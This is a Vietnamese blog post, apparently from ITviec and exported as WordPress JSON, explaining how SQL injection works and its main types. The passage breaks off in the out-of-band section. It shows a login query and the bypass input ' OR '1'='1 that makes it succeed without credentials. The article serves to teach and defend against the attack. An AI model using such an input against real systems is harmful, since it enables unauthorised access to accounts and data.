{"id":82168,"date":"2024-11-28T14:36:10","date_gmt":"2024-11-28T07:36:10","guid":{"rendered":"https:\/\/itviec.com\/blog\/?p=82168"},"modified":"2024-11-28T14:36:10","modified_gmt":"2024-11-28T07:36:10","slug":"sql-injection-la-gi","status":"publish","type":"post","link":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/","title":{"rendered":"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_85 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">N\u1ed9i dung b\u00e0i vi\u1ebft<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#SQL_Injection_la_gi\" >SQL Injection l\u00e0 g\u00ec?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#Cach_thuc_hoat_dong_cua_SQL_injection\" >C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng c\u1ee7a SQL injection<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#Co_che_tan_cong_SQL_Injection\" >C\u01a1 ch\u1ebf t\u1ea5n c\u00f4ng SQL Injection<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#Cac_loai_SQL_Injection_pho_bien\" >C\u00e1c lo\u1ea1i SQL Injection ph\u1ed5 bi\u1ebfn<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#Vi_du_ve_tung_loai_SQL_injection\" >V\u00ed d\u1ee5 v\u1ec1 t\u1eebng lo\u1ea1i SQL injection<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#Nguy_co_va_hau_qua_cua_SQL_Injection\" >Nguy c\u01a1 v\u00e0 h\u1eadu qu\u1ea3 c\u1ee7a SQL Injection<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#Cach_phong_chong_SQL_Injection\" >C\u00e1ch ph\u00f2ng ch\u1ed1ng SQL Injection<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#Cau_hoi_thuong_gap_ve_SQL_Injection\" >C\u00e2u h\u1ecfi th\u01b0\u1eddng g\u1eb7p v\u1ec1 SQL Injection<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#Tong_ket\" >T\u1ed5ng k\u1ebft<\/a><\/li><\/ul><\/nav><\/div>\n<p><em><strong>SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt nghi\u00eam tr\u1ecdng nh\u1ea5t, g\u00e2y thi\u1ec7t h\u1ea1i l\u1edbn cho c\u00e1c h\u1ec7 th\u1ed1ng web tr\u00ean to\u00e0n th\u1ebf gi\u1edbi. Hacker c\u00f3 th\u1ec3 khai th\u00e1c l\u1ed7 h\u1ed5ng n\u00e0y \u0111\u1ec3 truy c\u1eadp tr\u00e1i ph\u00e9p v\u00e0o d\u1eef li\u1ec7u ho\u1eb7c th\u1eadm ch\u00ed ki\u1ec3m so\u00e1t to\u00e0n b\u1ed9 c\u01a1 s\u1edf d\u1eef li\u1ec7u.<\/strong><\/em><\/p>\n<p><span style=\"font-weight: 400;\">\u0110\u1ecdc b\u00e0i vi\u1ebft n\u00e0y \u0111\u1ec3 hi\u1ec3u r\u00f5 h\u01a1n v\u1ec1:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">SQL injection l\u00e0 g\u00ec?<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Ph\u00e2n lo\u1ea1i SQL injection<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng c\u1ee7a SQL injection<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Nguy c\u01a1, h\u1eadu qu\u1ea3 v\u00e0 c\u00e1ch ph\u00f2ng ch\u1ed1ng<\/span><\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"SQL_Injection_la_gi\"><\/span><b>SQL Injection l\u00e0 g\u00ec?<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">SQL Injection (SQLi) l\u00e0 m\u1ed9t d\u1ea1ng t\u1ea5n c\u00f4ng b\u1ea3o m\u1eadt x\u1ea3y ra khi d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o c\u1ee7a ng\u01b0\u1eddi d\u00f9ng kh\u00f4ng \u0111\u01b0\u1ee3c ki\u1ec3m tra v\u00e0 x\u1eed l\u00fd tr\u01b0\u1edbc khi \u0111\u01b0a v\u00e0o th\u1ef1c hi\u1ec7n c\u00e2u l\u1ec7nh SQL.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Khi \u0111\u00f3 k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 ch\u00e8n c\u00e1c c\u00e2u l\u1ec7nh SQL \u0111\u1ed9c h\u1ea1i th\u00f4ng qua d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o nh\u1eb1m thao t\u00fang c\u01a1 s\u1edf d\u1eef li\u1ec7u ph\u00eda sau. Nh\u1eefng c\u00e2u l\u1ec7nh n\u00e0y c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng \u0111\u1ec3 ki\u1ec3m so\u00e1t ho\u00e0n to\u00e0n m\u00e1y ch\u1ee7 c\u01a1 s\u1edf d\u1eef li\u1ec7u, v\u01b0\u1ee3t qua c\u00e1c c\u01a1 ch\u1ebf b\u1ea3o m\u1eadt nh\u01b0 x\u00e1c th\u1ef1c v\u00e0 ph\u00e2n quy\u1ec1n c\u1ee7a \u1ee9ng d\u1ee5ng. Gi\u00fap cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 truy xu\u1ea5t, s\u1eeda \u0111\u1ed5i ho\u1eb7c x\u00f3a d\u1eef li\u1ec7u nh\u1ea1y c\u1ea3m, hay th\u1eadm ch\u00ed thay \u0111\u1ed5i c\u1ea5u tr\u00fac c\u1ee7a c\u01a1 s\u1edf d\u1eef li\u1ec7u.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">L\u1ed7 h\u1ed5ng SQL Injection c\u00f3 th\u1ec3 t\u1ed3n t\u1ea1i trong b\u1ea5t k\u1ef3 website ho\u1eb7c \u1ee9ng d\u1ee5ng web n\u00e0o s\u1eed d\u1ee5ng c\u01a1 s\u1edf d\u1eef li\u1ec7u SQL nh\u01b0 MySQL, Oracle, SQL Server ho\u1eb7c c\u00e1c h\u1ec7 qu\u1ea3n tr\u1ecb kh\u00e1c. H\u1eadu qu\u1ea3 c\u1ee7a c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng n\u00e0y c\u00f3 th\u1ec3 r\u1ea5t nghi\u00eam tr\u1ecdng, bao g\u1ed3m \u0111\u00e1nh c\u1eafp th\u00f4ng tin kh\u00e1ch h\u00e0ng, d\u1eef li\u1ec7u c\u00e1 nh\u00e2n, b\u00ed m\u1eadt doanh nghi\u1ec7p v\u00e0 t\u00e0i s\u1ea3n tr\u00ed tu\u1ec7.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt l\u00e2u \u0111\u1eddi, ph\u1ed5 bi\u1ebfn v\u00e0 nguy hi\u1ec3m nh\u1ea5t \u0111\u1ed1i v\u1edbi \u1ee9ng d\u1ee5ng web. Theo t\u1ed5 ch\u1ee9c OWASP (Open Web Application Security Project), c\u00e1c l\u1ed7 h\u1ed5ng li\u00ean quan \u0111\u1ebfn injection, bao g\u1ed3m SQL Injection, \u0111\u01b0\u1ee3c x\u1ebfp h\u1ea1ng l\u00e0 m\u1ed1i \u0111e d\u1ecda h\u00e0ng \u0111\u1ea7u trong t\u00e0i li\u1ec7u <\/span><a href=\"https:\/\/www.acunetix.com\/vulnerability-scanner\/owasp-top-10-compliance\/\" target=\"_blank\" rel=\"noopener\"><span style=\"font-weight: 400;\">OWASP Top 10<\/span><\/a><span style=\"font-weight: 400;\">. \u0110i\u1ec1u n\u00e0y nh\u1ea5n m\u1ea1nh t\u1ea7m quan tr\u1ecdng c\u1ee7a vi\u1ec7c hi\u1ec3u v\u00e0 ph\u00f2ng ng\u1eeba lo\u1ea1i t\u1ea5n c\u00f4ng n\u00e0y \u0111\u1ec3 b\u1ea3o v\u1ec7 d\u1eef li\u1ec7u v\u00e0 h\u1ec7 th\u1ed1ng.<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Cach_thuc_hoat_dong_cua_SQL_injection\"><\/span><b>C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng c\u1ee7a SQL injection<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">SQL Injection ho\u1ea1t \u0111\u1ed9ng b\u1eb1ng c\u00e1ch l\u1ee3i d\u1ee5ng nh\u1eefng \u0111i\u1ec3m y\u1ebfu trong vi\u1ec7c x\u1eed l\u00fd d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o c\u1ee7a \u1ee9ng d\u1ee5ng web. Khi ng\u01b0\u1eddi d\u00f9ng nh\u1eadp d\u1eef li\u1ec7u v\u00e0o m\u1ed9t tr\u01b0\u1eddng n\u00e0o \u0111\u00f3 tr\u00ean trang web, d\u1eef li\u1ec7u n\u00e0y s\u1ebd \u0111\u01b0\u1ee3c chuy\u1ec3n v\u00e0o m\u1ed9t c\u00e2u l\u1ec7nh SQL \u0111\u1ec3 truy v\u1ea5n c\u01a1 s\u1edf d\u1eef li\u1ec7u. N\u1ebfu \u1ee9ng d\u1ee5ng kh\u00f4ng ki\u1ec3m tra v\u00e0 l\u00e0m s\u1ea1ch d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o \u0111\u00fang c\u00e1ch, k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 ch\u00e8n c\u00e1c l\u1ec7nh SQL \u0111\u1ed9c h\u1ea1i \u0111\u1ec3 th\u1ef1c thi nh\u1eefng h\u00e0nh \u0111\u1ed9ng kh\u00f4ng mong mu\u1ed1n tr\u00ean c\u01a1 s\u1edf d\u1eef li\u1ec7u.<\/span><\/p>\n<blockquote><p><span style=\"font-weight: 400;\">H\u00e3y t\u01b0\u1edfng t\u01b0\u1ee3ng m\u1ed9t t\u00ecnh hu\u1ed1ng t\u1ea1i t\u00f2a \u00e1n, n\u01a1i m\u1ed9t ng\u01b0\u1eddi t\u00ean l\u00e0 Bob \u0111ang ch\u1edd x\u00e9t x\u1eed. Khi \u0111i\u1ec1n th\u00f4ng tin v\u00e0o bi\u1ec3u m\u1eabu tr\u01b0\u1edbc phi\u00ean t\u00f2a, Bob ghi t\u00ean m\u00ecnh l\u00e0 \u201cBob \u0111\u01b0\u1ee3c t\u1ef1 do r\u1eddi \u0111i\u201d. Khi \u0111\u1ebfn l\u01b0\u1ee3t x\u00e9t x\u1eed, th\u1ea9m ph\u00e1n \u0111\u1ecdc l\u1edbn: \u201cM\u1eddi Bob \u0111\u01b0\u1ee3c t\u1ef1 do r\u1eddi \u0111i\u201d. Nghe v\u1eady, vi\u00ean c\u1ea3nh s\u00e1t li\u1ec1n \u0111\u1ec3 Bob r\u1eddi kh\u1ecfi t\u00f2a, v\u00ec cho r\u1eb1ng \u0111\u00f3 l\u00e0 l\u1ec7nh c\u1ee7a th\u1ea9m ph\u00e1n.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">SQL Injection c\u0169ng ho\u1ea1t \u0111\u1ed9ng theo c\u00e1ch t\u01b0\u01a1ng t\u1ef1 nh\u01b0 v\u1eady.<\/span><\/p><\/blockquote>\n<p><span style=\"font-weight: 400;\">M\u1ed9t tr\u01b0\u1eddng d\u1eef li\u1ec7u trong c\u00e2u truy v\u1ea5n SQL, v\u1ed1n \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf \u0111\u1ec3 nh\u1eadn m\u1ed9t lo\u1ea1i d\u1eef li\u1ec7u c\u1ee5 th\u1ec3 nh\u01b0 s\u1ed1, l\u1ea1i nh\u1eadn v\u00e0o nh\u1eefng th\u00f4ng tin kh\u00f4ng mong \u0111\u1ee3i, ch\u1eb3ng h\u1ea1n nh\u01b0 m\u1ed9t l\u1ec7nh SQL. Khi l\u1ec7nh n\u00e0y \u0111\u01b0\u1ee3c th\u1ef1c thi, n\u00f3 tho\u00e1t ra kh\u1ecfi ph\u1ea1m vi d\u1ef1 ki\u1ebfn v\u00e0 c\u00f3 th\u1ec3 th\u1ef1c hi\u1ec7n c\u00e1c h\u00e0nh vi nguy hi\u1ec3m. C\u00e1c tr\u01b0\u1eddng truy v\u1ea5n n\u00e0y th\u01b0\u1eddng \u0111\u01b0\u1ee3c \u0111i\u1ec1n b\u1eb1ng d\u1eef li\u1ec7u t\u1eeb bi\u1ec3u m\u1eabu tr\u00ean trang web.<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Co_che_tan_cong_SQL_Injection\"><\/span><b>C\u01a1 ch\u1ebf t\u1ea5n c\u00f4ng SQL Injection<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>Ch\u00e8n m\u00e3 SQL \u0111\u1ed9c h\u1ea1i t\u1eeb \u0111\u1ea7u v\u00e0o ng\u01b0\u1eddi d\u00f9ng<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng t\u1eadn d\u1ee5ng c\u00e1c tr\u01b0\u1eddng nh\u1eadp li\u1ec7u nh\u01b0 \u00f4 \u0111\u0103ng nh\u1eadp ho\u1eb7c t\u00ecm ki\u1ebfm. Khi d\u1eef li\u1ec7u \u0111\u01b0\u1ee3c g\u1eedi, m\u00e3 SQL \u0111\u1ed9c h\u1ea1i c\u00f3 th\u1ec3 thay \u0111\u1ed5i c\u00e2u truy v\u1ea5n SQL ban \u0111\u1ea7u, d\u1eabn \u0111\u1ebfn vi\u1ec7c truy c\u1eadp ho\u1eb7c thao t\u00e1c d\u1eef li\u1ec7u kh\u00f4ng mong mu\u1ed1n.<\/span><\/p>\n<h3><b>Thay \u0111\u1ed5i c\u1ea5u tr\u00fac c\u00e2u l\u1ec7nh SQL<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng s\u1ebd s\u1eed d\u1ee5ng c\u00e1c k\u00fd t\u1ef1 \u0111\u1eb7c bi\u1ec7t nh\u01b0 <\/span><span style=\"font-weight: 400;\">&#8216;<\/span><span style=\"font-weight: 400;\">, <\/span><span style=\"font-weight: 400;\">&#8212;<\/span><span style=\"font-weight: 400;\">, ho\u1eb7c c\u00e1c \u0111i\u1ec1u ki\u1ec7n logic (<\/span><span style=\"font-weight: 400;\">OR 1=1<\/span><span style=\"font-weight: 400;\">) \u0111\u1ec3 ki\u1ec3m tra xem \u1ee9ng d\u1ee5ng c\u00f3 x\u1eed l\u00fd d\u1eef li\u1ec7u m\u1ed9t c\u00e1ch an to\u00e0n hay kh\u00f4ng. N\u1ebfu ph\u00e1t hi\u1ec7n l\u1ed7 h\u1ed5ng, ch\u00fang s\u1ebd khai th\u00e1c \u0111\u1ec3 th\u1ef1c thi c\u00e1c l\u1ec7nh SQL ngo\u00e0i \u00fd mu\u1ed1n c\u1ee7a developer.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">H\u1ec7 th\u1ed1ng c\u00f3 c\u00e2u l\u1ec7nh SQL nh\u1eadn th\u00f4ng tin \u0111\u1ea7u v\u00e0o c\u1ee7a ng\u01b0\u1eddi d\u00f9ng \u0111\u1ec3 \u0111\u0103ng nh\u1eadp nh\u01b0 sau:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">SELECT * FROM users WHERE username = 'ten_nguoi_dung' AND password = 'mat_khau';<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Trong \u0111\u00f3, <\/span><span style=\"font-weight: 400;\">ten_nguoi_dung<\/span><span style=\"font-weight: 400;\"> l\u00e0 d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o. N\u1ebfu k\u1ebb t\u1ea5n c\u00f4ng l\u1ee3i d\u1ee5ng \u0111i\u1ec1u n\u00e0y \u0111\u1ec3 nh\u1eadp d\u1eef li\u1ec7u nh\u01b0 sau: <\/span><span style=\"font-weight: 400;\">&#8216; OR &#8216;1&#8217;=&#8217;1,<\/span><span style=\"font-weight: 400;\"> th\u00ec l\u00fac n\u00e0y c\u00e2u SQL s\u1ebd tr\u1edf th\u00e0nh:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Nh\u01b0 v\u1eady k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 \u0111\u0103ng nh\u1eadp m\u00e0 kh\u00f4ng c\u1ea7n t\u00ean \u0111\u0103ng nh\u1eadp ho\u1eb7c m\u1eadt kh\u1ea9u.<\/span><\/p>\n<h3><b>SQL Injection c\u00f3 th\u1ec3 xu\u1ea5t hi\u1ec7n \u1edf nhi\u1ec1u ph\u1ea7n kh\u00e1c nhau trong c\u00e2u truy v\u1ea5n<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">H\u1ea7u h\u1ebft c\u00e1c SQL Injection x\u1ea3y ra trong ph\u1ea7n <\/span><span style=\"font-weight: 400;\">WHERE<\/span><span style=\"font-weight: 400;\"> c\u1ee7a c\u00e2u truy v\u1ea5n <\/span><span style=\"font-weight: 400;\">SELECT<\/span><span style=\"font-weight: 400;\">, v\u00e0 nh\u1eefng ng\u01b0\u1eddi ki\u1ec3m th\u1eed c\u00f3 kinh nghi\u1ec7m th\u01b0\u1eddng quen thu\u1ed9c v\u1edbi lo\u1ea1i SQL Injection n\u00e0y. Tuy nhi\u00ean, l\u1ed7 h\u1ed5ng SQL Injection c\u00f3 th\u1ec3 x\u1ea3y ra \u1edf b\u1ea5t k\u1ef3 v\u1ecb tr\u00ed n\u00e0o trong c\u00e2u truy v\u1ea5n v\u00e0 trong c\u00e1c lo\u1ea1i c\u00e2u truy v\u1ea5n kh\u00e1c nhau.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">M\u1ed9t s\u1ed1 v\u1ecb tr\u00ed ph\u1ed5 bi\u1ebfn kh\u00e1c m\u00e0 SQL Injection c\u00f3 th\u1ec3 xu\u1ea5t hi\u1ec7n l\u00e0:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Trong c\u00e2u l\u1ec7nh <\/span><span style=\"font-weight: 400;\">UPDATE<\/span><span style=\"font-weight: 400;\">, ngay t\u1ea1i c\u00e1c gi\u00e1 tr\u1ecb \u0111\u01b0\u1ee3c c\u1eadp nh\u1eadt ho\u1eb7c trong ph\u1ea7n <\/span><span style=\"font-weight: 400;\">WHERE<\/span><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Trong c\u00e2u l\u1ec7nh <\/span><span style=\"font-weight: 400;\">INSERT<\/span><span style=\"font-weight: 400;\">, t\u1ea1i c\u00e1c gi\u00e1 tr\u1ecb \u0111\u01b0\u1ee3c ch\u00e8n v\u00e0o.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Trong c\u00e2u l\u1ec7nh <\/span><span style=\"font-weight: 400;\">SELECT<\/span><span style=\"font-weight: 400;\">, t\u1ea1i t\u00ean b\u1ea3ng ho\u1eb7c t\u00ean c\u1ed9t.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Trong <a href=\"https:\/\/itviec.com\/blog\/select-trong-sql\/\" target=\"_blank\" rel=\"noopener\">c\u00e2u l\u1ec7nh SELECT<\/a><\/span><span style=\"font-weight: 400;\">, t\u1ea1i ph\u1ea7n <\/span><span style=\"font-weight: 400;\">ORDER BY<\/span><span style=\"font-weight: 400;\">.<\/span><\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"Cac_loai_SQL_Injection_pho_bien\"><\/span><b>C\u00e1c lo\u1ea1i SQL Injection ph\u1ed5 bi\u1ebfn<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">SQL Injection (SQLi) th\u01b0\u1eddng \u0111\u01b0\u1ee3c ph\u00e2n th\u00e0nh ba lo\u1ea1i ch\u00ednh, d\u1ef1a tr\u00ean ph\u01b0\u01a1ng ph\u00e1p khai th\u00e1c d\u1eef li\u1ec7u v\u00e0 m\u1ee9c \u0111\u1ed9 g\u00e2y h\u1ea1i nh\u01b0 sau:<\/span><\/p>\n<h3><b>SQL Injection lo\u1ea1i 1: In-band SQLi (C\u1ed5 \u0111i\u1ec3n)<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">\u0110\u00e2y l\u00e0 lo\u1ea1i SQL Injection ph\u1ed5 bi\u1ebfn v\u00e0 d\u1ec5 th\u1ef1c hi\u1ec7n nh\u1ea5t. K\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng c\u00f9ng m\u1ed9t k\u00eanh giao ti\u1ebfp \u0111\u1ec3 th\u1ef1c hi\u1ec7n t\u1ea5n c\u00f4ng v\u00e0 thu th\u1eadp k\u1ebft qu\u1ea3. In-band SQLi c\u00f3 hai bi\u1ebfn th\u1ec3 ch\u00ednh:<\/span><\/p>\n<h4><b>Error-based SQLi<\/b><\/h4>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng c\u1ed1 t\u00ecnh th\u1ef1c hi\u1ec7n c\u00e1c h\u00e0nh \u0111\u1ed9ng g\u00e2y ra l\u1ed7i t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u. Th\u00f4ng tin t\u1eeb c\u00e1c th\u00f4ng b\u00e1o l\u1ed7i n\u00e0y c\u00f3 th\u1ec3 ti\u1ebft l\u1ed9 c\u1ea5u tr\u00fac ho\u1eb7c d\u1eef li\u1ec7u c\u1ee7a c\u01a1 s\u1edf d\u1eef li\u1ec7u. V\u00ed d\u1ee5: th\u00f4ng b\u00e1o l\u1ed7i v\u1ec1 c\u00fa ph\u00e1p c\u00f3 th\u1ec3 ti\u1ebft l\u1ed9 t\u00ean b\u1ea3ng ho\u1eb7c c\u1ed9t trong c\u01a1 s\u1edf d\u1eef li\u1ec7u.<\/span><\/p>\n<h4><b>Union-based SQLi<\/b><\/h4>\n<p><span style=\"font-weight: 400;\">K\u1ef9 thu\u1eadt n\u00e0y l\u1ee3i d\u1ee5ng c\u00e2u l\u1ec7nh <\/span><span style=\"font-weight: 400;\">UNION<\/span><span style=\"font-weight: 400;\"> \u0111\u1ec3 k\u1ebft h\u1ee3p nhi\u1ec1u truy v\u1ea5n <\/span><span style=\"font-weight: 400;\">SELECT<\/span><span style=\"font-weight: 400;\">, t\u1ea1o ra m\u1ed9t ph\u1ea3n h\u1ed3i HTTP duy nh\u1ea5t ch\u1ee9a d\u1eef li\u1ec7u t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng. K\u1ef9 thu\u1eadt n\u00e0y \u0111\u00f2i h\u1ecfi tin t\u1eb7c ph\u1ea3i c\u00f3 hi\u1ec3u bi\u1ebft nh\u1ea5t \u0111\u1ecbnh v\u1ec1 c\u1ea5u tr\u00fac c\u1ee7a b\u1ea3ng trong c\u01a1 s\u1edf d\u1eef li\u1ec7u \u0111\u1ecbnh t\u1ea5n c\u00f4ng.<\/span><\/p>\n<h3><b>SQL Injection lo\u1ea1i 2: Inferential SQLi (Blind SQL injection)<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Lo\u1ea1i t\u1ea5n c\u00f4ng n\u00e0y kh\u00f4ng tr\u1ef1c ti\u1ebfp tr\u1ea3 v\u1ec1 d\u1eef li\u1ec7u m\u00e0 d\u1ef1a v\u00e0o vi\u1ec7c quan s\u00e1t ph\u1ea3n h\u1ed3i v\u00e0 h\u00e0nh vi c\u1ee7a m\u00e1y ch\u1ee7 \u0111\u1ec3 suy lu\u1eadn. V\u00ec kh\u00f4ng nh\u1eadn \u0111\u01b0\u1ee3c d\u1eef li\u1ec7u tr\u1ef1c ti\u1ebfp, n\u00ean \u0111\u01b0\u1ee3c g\u1ecdi l\u00e0 &#8220;m\u00f9&#8221;. Inferential SQLi th\u01b0\u1eddng m\u1ea5t nhi\u1ec1u th\u1eddi gian h\u01a1n nh\u01b0ng v\u1eabn c\u00f3 th\u1ec3 g\u00e2y h\u1ea1i nghi\u00eam tr\u1ecdng v\u00e0 \u0111\u01b0\u1ee3c chia l\u00e0m hai lo\u1ea1i ch\u00ednh nh\u01b0 sau:<\/span><\/p>\n<h4><b>Boolean-based SQLi<\/b><\/h4>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng g\u1eedi c\u00e1c truy v\u1ea5n SQL v\u1edbi \u0111i\u1ec1u ki\u1ec7n \u0111\u00fang\/sai v\u00e0 quan s\u00e1t ph\u1ea3n h\u1ed3i t\u1eeb \u1ee9ng d\u1ee5ng \u0111\u1ec3 x\u00e1c \u0111\u1ecbnh tr\u1ea1ng th\u00e1i c\u1ee7a c\u00e2u truy v\u1ea5n.<\/span><\/p>\n<h4><b>Time-based SQLi<\/b><\/h4>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng g\u1eedi truy v\u1ea5n bu\u1ed9c c\u01a1 s\u1edf d\u1eef li\u1ec7u t\u1ea1m d\u1eebng trong m\u1ed9t kho\u1ea3ng th\u1eddi gian. D\u1ef1a v\u00e0o th\u1eddi gian ph\u1ea3n h\u1ed3i, k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 x\u00e1c \u0111\u1ecbnh k\u1ebft qu\u1ea3 \u0111\u00fang\/sai c\u1ee7a truy v\u1ea5n m\u00e0 kh\u00f4ng c\u1ea7n truy xu\u1ea5t d\u1eef li\u1ec7u tr\u1ef1c ti\u1ebfp.<\/span><\/p>\n<h3><b>SQL Injection lo\u1ea1i 3: Out-of-band SQLi<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Lo\u1ea1i t\u1ea5n c\u00f4ng n\u00e0y ch\u1ec9 kh\u1ea3 thi khi m\u00e1y ch\u1ee7 c\u01a1 s\u1edf d\u1eef li\u1ec7u h\u1ed7 tr\u1ee3 c\u00e1c 